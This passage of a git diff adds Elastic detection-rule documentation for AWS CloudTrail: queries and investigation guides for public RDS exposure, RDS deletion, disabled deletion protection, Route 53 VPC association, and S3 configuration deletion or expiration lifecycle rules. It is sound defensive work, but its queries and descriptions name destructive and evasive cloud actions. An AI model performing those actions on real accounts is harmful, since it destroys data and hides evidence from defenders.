request (e.g., master user changes, security group updates) + +- **Validate the target resource** + - Determine the sensitivity of the instance: + - What data does it store? + - Is it production, staging, dev, or ephemeral? + - Confirm whether the instance was previously private. + +- **Assess network exposure** + - Check associated security groups for: + - `0.0.0.0/0` (unrestricted ingress) + - Unexpected IP ranges + - Review VPC/subnet placement to determine if the instance is reachable externally. + +- **Correlate with other recent CloudTrail activity** + - Look for related events performed by the same actor: + - `AuthorizeSecurityGroupIngress` + - `ModifyDBInstance` + - IAM policy modifications enabling broader DB access + - Look for indicators of credential misuse: + - unusual `source.ip` + - unusual `user_agent.original` + - MFA not used (`session_context.mfa_authenticated=false`) + +- **Validate intent with owners** + - Contact the service or database owner to confirm whether the change was an approved part of a deployment or migration. + + +*False Positive Analysis* + + +- **Expected public-access configuration** + - Some workloads intentionally require public access (e.g., internet-facing reporting tools). + - Validate against change management tickets, deployment pipelines, or Terraform/IaC automation logs. + + +*Response and Remediation* + + +- **Containment** + - If exposure is unauthorized: + - Modify the instance to disable public access (`publiclyAccessible=false`). + - Restrict the security group inbound rules immediately. + - Snapshot the instance to preserve state if compromise is suspected. + +- **Investigation** + - Review all recent actions from the same IAM principal. + - Check for data access patterns (CloudWatch, RDS Enhanced Monitoring, VPC Flow Logs). + - Identify whether this exposure correlates with suspicious outbound network activity. + +- **Hardening** + - Require private-only RDS instances unless explicitly documented. + - Enforce security group least privilege and block public DB access via: + - AWS Config rules (`rds-instance-public-access-check`) + - Service Control Policies (SCPs) preventing public RDS settings + - Implement continuous monitoring for network or configuration drift. + +- **Recovery** + - Restore the database to a private subnet if necessary. + - Rotate credentials used by the DB instance and associated applications. + - Document the incident and update policies or IaC templates to prevent recurrence. + + +*Additional Information:* + + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +any where data_stream.dataset == "aws.cloudtrail" + and event.provider == "rds.amazonaws.com" + and event.outcome == "success" + and ( + (event.action == "ModifyDBInstance" and stringContains(aws.cloudtrail.request_parameters, "publiclyAccessible=true")) + or + (event.action in ("CreateDBInstance", "CreateDBCluster") and stringContains(aws.cloudtrail.request_parameters, "publiclyAccessible=true")) + ) + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Sub-technique: +** Name: Conditional Access Policies +** ID: T1556.009 +** Reference URL: https://attack.mitre.org/techniques/T1556/009/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deleted.asciidoc new file mode 100644 index 0000000000..63f19a3670 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deleted.asciidoc @@ -0,0 +1,187 @@ +[[prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deleted]] +=== AWS RDS DB Instance or Cluster Deleted + +Identifies the deletion of an Amazon RDS DB instance, Aurora cluster, or global database cluster. Deleting these resources permanently destroys stored data and can cause major service disruption. Adversaries with sufficient permissions may delete RDS resources to impede recovery, destroy evidence, or inflict operational impact on the environment. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html +* https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteGlobalCluster.html +* https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBInstance.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS RDS +* Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 213 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS RDS DB Instance or Cluster Deleted* + + +This rule detects the deletion of an RDS DB instance, Aurora DB cluster, or global database cluster. These operations permanently remove stored data and backups unless final snapshots are explicitly retained. Adversaries may delete RDS resources as part of a destructive attack, to eliminate forensic evidence, or to disrupt critical workloads. Because deletions are irreversible without backups, immediate review is required to determine whether the action was authorized and assess potential data loss. + + +*Possible investigation steps* + + +**Identify the Actor** +- Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine who performed the action. +- Validate: + - Is this user/role authorized to delete DB instances or clusters? + - Does this action align with past behavior? + +**Review the Deletion Event** +- Confirm which action was invoked: `DeleteDBInstance`, `DeleteDBCluster` or `DeleteGlobalCluster` +- Examine `aws.cloudtrail.request_parameters`. Identify which resource was deleted and whether a final snapshot was created before deletion. + +**Analyze Source and Access Context** +- Check `source.ip`, `source.geo` fields and `user_agent.original` +- Validate whether: + - The request originated from a known network or VPN. + - The user normally logs in from this location. + - The call was made via AWS Console vs CLI vs SDK. + +**Correlate Surrounding Activity** +Search CloudTrail for: +- Recent IAM role or policy changes. +- Privilege escalation events (STS AssumeRole, CreateAccessKey, AttachUserPolicy). +- Disablement of related safety controls: + - deletionProtection modified to `false` + - backupRetentionPeriod set to `0` +- Suspicious sequencing: + - Snapshots deleted before the instance/cluster deletion. + - Network security group modifications enabling broader access before deletion. + +**Validate Organizational Intent** +- Contact the service owner or DB administrator to confirm whether the deletion is expected. + +**Assess Impact and Data Recovery Path** +- Identify which DB instance or cluster was deleted +- Evaluate: + - Whether automated backups existed. + - Whether point-in-time recovery is still possible. + - Whether a final snapshot was created. + + +*False positive analysis* + + +- **Planned decommissioning**: + - Confirm if this action aligns with a scheduled removal or environment cleanup. +- **CloudFormation stack deletion**: + - Stack teardown often deletes RDS resources; confirm if this occurred. +- **Automated testing or ephemeral environments**: + - Test/dev pipelines may frequently create and delete clusters. +- **Infrastructure-as-code workflows**: + - Terraform destroys or GitOps cleanup jobs can generate legitimate deletion events. + + +*Response and remediation* + + +**If the deletion was unauthorized:** +**Immediately restrict the actor** + - Disable or revoke the user’s access keys. + - Revoke active session tokens. + +**Attempt recovery** + - Restore from: + - Final snapshot (if created) + - Automated backups + - Rebuild cluster/instance configurations based on IaC or documented templates. + +**Perform full log review** + - CloudTrail, RDS Enhanced Monitoring, and VPC Flow Logs + - Identify lateral movement or privilege escalation preceding the deletion. + +**Scope and contain the incident** + - Determine whether: + - Additional RDS resources were targeted + - IAM permissions were modified + - Other destructive API calls were made + +**Hardening actions** + - Enable deletionProtection on all critical instances/clusters. + - Require final snapshot creation for all deletion operations. + - Enforce MFA for IAM users with RDS privileges. + - Limit RDS modification/deletion permissions to specific IAM roles. + +**Documentation and Follow-Up** + - Update incident response runbooks. + - Communicate with service owners and leadership. + - Add enhanced monitoring rules around: + - Snapshot deletions + - Backup retention modifications + - RDS role changes + - DeletionProtection disable events + + +*Additional information* + + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: aws.cloudtrail + and event.provider: rds.amazonaws.com + and event.action: (DeleteDBCluster or DeleteGlobalCluster or DeleteDBInstance) + and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deletion-protection-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deletion-protection-disabled.asciidoc new file mode 100644 index 0000000000..bfa1e12ddf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deletion-protection-disabled.asciidoc @@ -0,0 +1,168 @@ +[[prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deletion-protection-disabled]] +=== AWS RDS DB Instance or Cluster Deletion Protection Disabled + +Identifies the modification of an AWS RDS DB instance or cluster to disable the deletionProtection feature. Deletion protection prevents accidental or unauthorized deletion of RDS resources. Adversaries with sufficient permissions may disable this protection as a precursor to destructive actions, including the deletion of databases containing sensitive or business-critical data. This rule alerts when deletionProtection is explicitly set to false on an RDS DB instance or cluster. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBInstance.html +* https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_DeleteInstance.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS RDS +* Tactic: Impact +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 10 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS RDS DB Instance or Cluster Deletion Protection Disabled* + + +Deletion protection is designed to safeguard RDS DB instances and clusters from accidental or unauthorized deletion. An adversary with privileged access in a compromised environment, can disable this safeguard before issuing a `DeleteDBInstance` or `DeleteDBCluster` action. This rule detects successful attempts to modify deletionProtection and set it to false on any RDS instance or cluster. + + +*Possible investigation steps* + + +- **Identify the Actor** + - Review `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.type`, and `access_key_id` to determine which IAM principal made the change. + - Validate whether this principal normally performs RDS lifecycle operations. + +- **Review Event Details** + - Inspect `aws.cloudtrail.request_parameters` to confirm the targeted DB instance or cluster identifier. + - Confirm that the request explicitly contains `deletionProtection=false`. + +- **Contextualize the Change** + - Determine if recent activities justify the removal of deletion protection (migration, decommissioning, or maintenance). + - Compare the timestamp to normal operational hours or deployment windows. + +- **Correlate with Additional Activity** + - Look for subsequent or preceding RDS actions such as: + - `DeleteDBInstance` + - `DeleteDBCluster` + - Security group modifications + - Changes to parameter groups or backup retention policies. + - Sudden removal of backups or snapshots may indicate imminent destructive activity. + +- **Verify Environmental Risk** + - Assess the sensitivity of data stored in the affected DB instance or cluster. + - Determine if the instance is production, customer-facing, or mission-critical. + +- **Interview Relevant Personnel** + - Confirm with service owners or DB administrators whether the modification was intended and approved. + + +*False positive analysis* + + +- **Expected Decommissioning** + - Instances undergoing teardown or migration legitimately require deletion protection to be disabled first. + +- **Inconsistent Historical Behavior** + - Compare the action to historical modification patterns for the user or role. If the action aligns with past legitimate changes, it may not be suspicious. + + +*Response and remediation* + + +- **Immediate Remediation** + - If unauthorized, re-enable deletion protection (`deletionProtection=true`) on the affected DB instance or cluster. + - Review security groups, backup retention, and snapshot policies for additional unauthorized changes. + +- **Access Review** + - Investigate credential exposure for the IAM principal that performed the action. + - Rotate access keys or temporarily revoke permissions if compromise is suspected. + +- **Containment** + - If destructive intent is suspected, apply guardrails (e.g., IAM condition keys, SCPs) to prevent DB deletion. + +- **Audit and Harden** + - Ensure RDS instances adhere to least-privilege principles. + - Restrict who can modify `ModifyDBInstance` or `ModifyDBCluster` destructive settings, such as deletion protection, backup retention, and public accessibility. + +- **Incident Response Activation** + - Treat unauthorized removal of deletion protection as a high-risk precursor to data destruction. + - Trigger IR processes for containment, root cause analysis, and post-incident hardening. + + +*Additional information* + + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +any where data_stream.dataset == "aws.cloudtrail" + and event.provider == "rds.amazonaws.com" + and event.action in ("ModifyDBInstance", "ModifyDBCluster") + and event.outcome == "success" + and stringContains(aws.cloudtrail.request_parameters, "deletionProtection=false") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Cloud Compute Infrastructure +** ID: T1578 +** Reference URL: https://attack.mitre.org/techniques/T1578/ +* Sub-technique: +** Name: Modify Cloud Compute Configurations +** ID: T1578.005 +** Reference URL: https://attack.mitre.org/techniques/T1578/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-route-53-private-hosted-zone-associated-with-a-vpc.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-route-53-private-hosted-zone-associated-with-a-vpc.asciidoc new file mode 100644 index 0000000000..65b70ea4b4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-route-53-private-hosted-zone-associated-with-a-vpc.asciidoc @@ -0,0 +1,180 @@ +[[prebuilt-rule-8-19-32-aws-route-53-private-hosted-zone-associated-with-a-vpc]] +=== AWS Route 53 Private Hosted Zone Associated With a VPC + +Identifies when an AWS Route 53 private hosted zone is associated with a new Virtual Private Cloud (VPC). Private hosted zones restrict DNS resolution to specific VPCs, and associating additional VPCs expands the scope of what networks can resolve internal DNS records. Adversaries with sufficient permissions may associate unauthorized VPCs to intercept, observe, or reroute internal traffic, establish persistence, or expand their visibility within an AWS environment. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/Route53/latest/APIReference/API_AssociateVPCWithHostedZone.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Route 53 +* Tactic: Persistence +* Tactic: Resource Development +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 214 + +*Rule authors*: + +* Austin Songer +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Route 53 Private Hosted Zone Associated With a VPC* + + +Route 53 private hosted zones provide internal DNS capabilities accessible only to the VPCs explicitly associated with +them. Associating a new VPC expands DNS visibility and access. If an adversary gains sufficient IAM permissions, they may +attach unauthorized VPCs to privileged hosted zones to perform internal reconnaissance, intercept service discovery, +redirect traffic, or gain persistence by manipulating internal name resolution. + +This rule detects successful `AssociateVPCWithHostedZone` events where a hosted zone's visibility scope is modified. + + +*Possible investigation steps* + + +- **Identify the Actor** + - Review `aws.cloudtrail.user_identity.arn` and `access_key_id` to determine who initiated the association. Validate whether this identity is expected to manage Route 53 or VPC networking. + +- **Review Request Details** + - Examine `aws.cloudtrail.request_parameters` to confirm which hosted zone and VPC were associated. Determine if the hosted zone contains sensitive internal service records, privileged DNS, or identity service endpoints. + +- **Validate the VPC** + - Identify whether the associated VPC belongs to an authorized environment (e.g., known production, staging, or internal networks). Check for unusual VPC creation events, cross-account VPC behavior, or recently observed anomalous resource provisioning. + +- **Assess Source Context** + - Inspect `source.ip` and `user_agent.original` for geographic anomalies, automation patterns, or suspicious tooling. + - Look for correlations with unusual IAM activity, privilege escalations, or policy modifications. + +- **Correlate With Broader Activity** + - Search for additional changes involving the same identity, including: + - Route 53 hosted zone modifications + - VPC peering creation + - Network ACL or security group changes + - IAM privilege modifications + - Identify whether this association is part of a larger sequence suggesting lateral movement or internal reconnaissance. + +- **Engage Relevant Teams** + - If initiated by a user, confirm intent with networking or cloud infrastructure teams. Validate whether the association aligns with deployment, migration, or environment expansion activities. + + +*False positive analysis* + + +- **Routine Infrastructure Updates** + - Associations may occur during normal environment expansions (new VPC for microservices, deployments, region expansion). + +- **Automated Tooling** + - Infrastructure-as-code pipelines (Terraform, CloudFormation, CDK) may regularly modify hosted zone associations. + - If confirmed legitimate, consider excluding specific automation IAM roles. + +- **Migration or Restructuring Events** + - Large-scale cloud migrations or VPC re-architecture work may trigger frequent legitimate associations. + + +*Response and remediation* + + +- **Revoke Unauthorized Access** + - If the association is unauthorized, review and restrict IAM permissions for the actor. + - Remove the VPC association if it is not intended. + +- **Investigate Potential Impact** + - Review internal DNS query logs and VPC flow logs for any misuse, suspicious lookups, or unauthorized cross-VPC traffic. + +- **Strengthen IAM Controls** + - Limit `route53:AssociateVPCWithHostedZone` to specific administrative roles. + - Require MFA for accounts with Route 53 and VPC modification permissions. + +- **Monitor for Related Activity** + - Add monitoring for other hosted zone modifications, new VPC creation, and cross-account network configurations. + +- **Communicate and Document** + - Notify cloud networking and security operations of unauthorized changes. + - Document findings and update policy controls or automation baselines. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]** + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: aws.cloudtrail + and event.provider: route53.amazonaws.com + and event.action: AssociateVPCWithHostedZone + and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Acquire Infrastructure +** ID: T1583 +** Reference URL: https://attack.mitre.org/techniques/T1583/ +* Sub-technique: +** Name: Domains +** ID: T1583.001 +** Reference URL: https://attack.mitre.org/techniques/T1583/001/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Adversary-in-the-Middle +** ID: T1557 +** Reference URL: https://attack.mitre.org/techniques/T1557/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-configuration-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-configuration-deletion.asciidoc new file mode 100644 index 0000000000..3b01b41ccf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-configuration-deletion.asciidoc @@ -0,0 +1,168 @@ +[[prebuilt-rule-8-19-32-aws-s3-bucket-configuration-deletion]] +=== AWS S3 Bucket Configuration Deletion + +Identifies the deletion of critical Amazon S3 bucket configurations such as bucket policies, lifecycle configurations or encryption settings. These actions are typically administrative but may also represent adversarial attempts to remove security controls, disable data retention mechanisms, or conceal evidence of malicious activity. Adversaries who gain access to AWS credentials may delete logging, lifecycle, or policy configurations to disrupt forensic visibility and inhibit recovery. For example, deleting a bucket policy can open a bucket to public access or remove protective access restrictions, while deleting lifecycle rules can prevent object archival or automatic backups. Such actions often precede data exfiltration or destructive operations and should be reviewed in context with related S3 or IAM events. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketPolicy.html +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketReplication.html +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketCors.html +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketEncryption.html +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketLifecycle.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 +* Tactic: Defense Evasion +* Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 215 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS S3 Bucket Configuration Deletion* + + +Amazon S3 is a scalable storage service where configurations like policies, replication, and encryption ensure data security and compliance. The detection rule monitors successful deletions of these configurations via the following APIs: `DeleteBucketPolicy`, `DeleteBucketReplication`, `DeleteBucketCors`, `DeleteBucketEncryption` or `DeleteBucketLifecycle`. These operations can be used by an adversary to remove visibility, erase governance or compliance controls, or prepare a bucket for destructive or exfiltration activity. +Deleting or disabling important configurations may hamper audit trails, hide malicious changes, or reduce the ability for recovery. The detection of these deletes is therefore a potential indicator of defense evasion or impact techniques. + + +*Possible investigation steps* + + +- **Identify the Actor and Context** + - Review `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.access_key_id` and `aws.cloudtrail.user_identity.type` to identify who performed the deletion. + - Determine whether the actor typically manages bucket configurations, or if this is an unusual identity for this kind of operation. + - Check `source.ip`, `user_agent.original`, `cloud.region` for anomalous behaviour (unfamiliar IPs, new tooling or region, off-hours actions). + +- **Determine the Affected Bucket and Configuration Type** + - Examine `aws.cloudtrail.request_parameters` (and `aws.cloudtrail.resources.arn`) to identify the bucket and the sub-resource that was removed. + - Determine whether the bucket is used for critical data (audit logs, backups, data warehouse). If so, the deletion is higher risk. + +- **Correlate with Other Activity to Establish Chain of Events** + - Search for preceding or concurrent CloudTrail events by the same actor or on the same bucket, e.g.: + - Removal of logging or access controls (`PutBucketLogging`, `PutBucketAcl`, `PutBucketPolicy`). + - Object-level actions soon after configuration removal (`DeleteObject`, `DeleteObjects`, `PutObject`, cross-account copy) that suggest data removal or exfiltration. + - Review for configuration additions or changes immediately prior (e.g., versioning disabled, replication removed) — could form part of a larger attack sequence. + +- **Evaluate Intent and Risk** + - Confirm whether the change is aligned with an approved change control process (maintenance, re-architecting, cost-optimization). + - If no documented justification, or if it affects buckets with sensitive or compliance-related data, treat it as potential malicious behavior. + - Prioritize buckets where configuration deletion significantly reduces visibility or recovery capability. + + +*False positive analysis* + + +- **Scheduled Maintenance or Re-architecture**: + - Valid operations may include migrating buckets, retiring services, or reorganizing storage; verify through change logs. +- **Automation/DevOps Activity**: + - Infrastructure-as-Code pipelines or lifecycle clean-up tasks may remove configurations; validate known automation scopes and service-principals. +- **Test/Development Buckets**: + - Non-production environments may frequently change bucket configurations; document and consider whitelisting accordingly. + + +*Response and remediation* + + +**Containment & Immediate Actions** +- Temporarily restrict the IAM user or role that performed the deletion, especially for `DeleteBucketPolicy`, `DeleteBucketEncryption`, or `DeleteBucketLifecycle`. +- Restore missing configurations as soon as possible (e.g., re-apply bucket policy, lifecycle rules, inventory configuration) to prevent further blind spots. + +**Investigation & Scope Assessment** +- Using CloudTrail and S3 Data Events, check object‐level activity from the timeframe immediately before and after the configuration deletion. Look for bulk deletes, new uploads, or copies to external accounts. +- Check whether other buckets in the account suffered similar configuration changes – potentially part of a wider campaign. + +**Recovery & Hardening** +- Recover affected bucket configurations and ensure they match your organizational baseline and compliance standards (e.g., logging enabled, inventory configured, lifecycle rules active). +- Enable AWS Config rules such as `s3-bucket-policy-check`, `s3-bucket-lifecycle-configuration-check`, `s3-bucket-logging-enabled` to monitor for unauthorized changes. +- Apply least‐privilege for configuration deletion permissions; segregate duties so bucket config deletion can only be done via controlled workflows and require multi-step approval. + +**Lessons Learned & Prevention** +- Conduct a post-incident review to determine root cause (credential compromise, misconfigured automation, malicious insider) and strengthen monitoring, alerting and access controls accordingly. + + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:aws.cloudtrail and + event.provider:s3.amazonaws.com and + event.action:(DeleteBucketPolicy or + DeleteBucketReplication or + DeleteBucketCors or + DeleteBucketEncryption or + DeleteBucketLifecycle) and + event.outcome:success + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-expiration-lifecycle-configuration-added.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-expiration-lifecycle-configuration-added.asciidoc new file mode 100644 index 0000000000..0a3c9cc19e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-expiration-lifecycle-configuration-added.asciidoc @@ -0,0 +1,189 @@ +[[prebuilt-rule-8-19-32-aws-s3-bucket-expiration-lifecycle-configuration-added]] +=== AWS S3 Bucket Expiration Lifecycle Configuration Added + +Identifies the addition of an expiration lifecycle configuration to an Amazon S3 bucket. S3 lifecycle rules can automatically delete or transition objects after a defined period. Adversaries can abuse them by configuring auto-deletion of logs, forensic evidence, or sensitive objects to cover their tracks. This rule detects the use of the PutBucketLifecycle or PutBucketLifecycleConfiguration APIs with Expiration parameters, which may indicate an attempt to automate the removal of data to hinder investigation or maintain operational secrecy after malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AmazonS3/latest/userguide/lifecycle-expire-general-considerations.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 +* Tactic: Defense Evasion +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 9 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS S3 Bucket Expiration Lifecycle Configuration Added* + + +This rule detects when a lifecycle expiration policy is added to an S3 bucket via the `PutBucketLifecycle` or `PutBucketLifecycleConfiguration` API. Note: `PutBucketLifecycleConfiguration` is the newer supported API call, however both of these API calls show up as `PutBucketLifecycle` in Cloudtrail https://docs.aws.amazon.com/AmazonS3/latest/userguide/cloudtrail-logging-s3-info.html#cloudtrail-bucket-level-tracking[ref]. +Lifecycle expiration automatically deletes objects after a defined period (`Expiration:Days`), which can be leveraged by adversaries to erase logs, exfiltration evidence, or security artifacts before detection and response teams can review them. + +Because deletion is automated and often silent, detecting the initial configuration event is critical. + + +*Possible 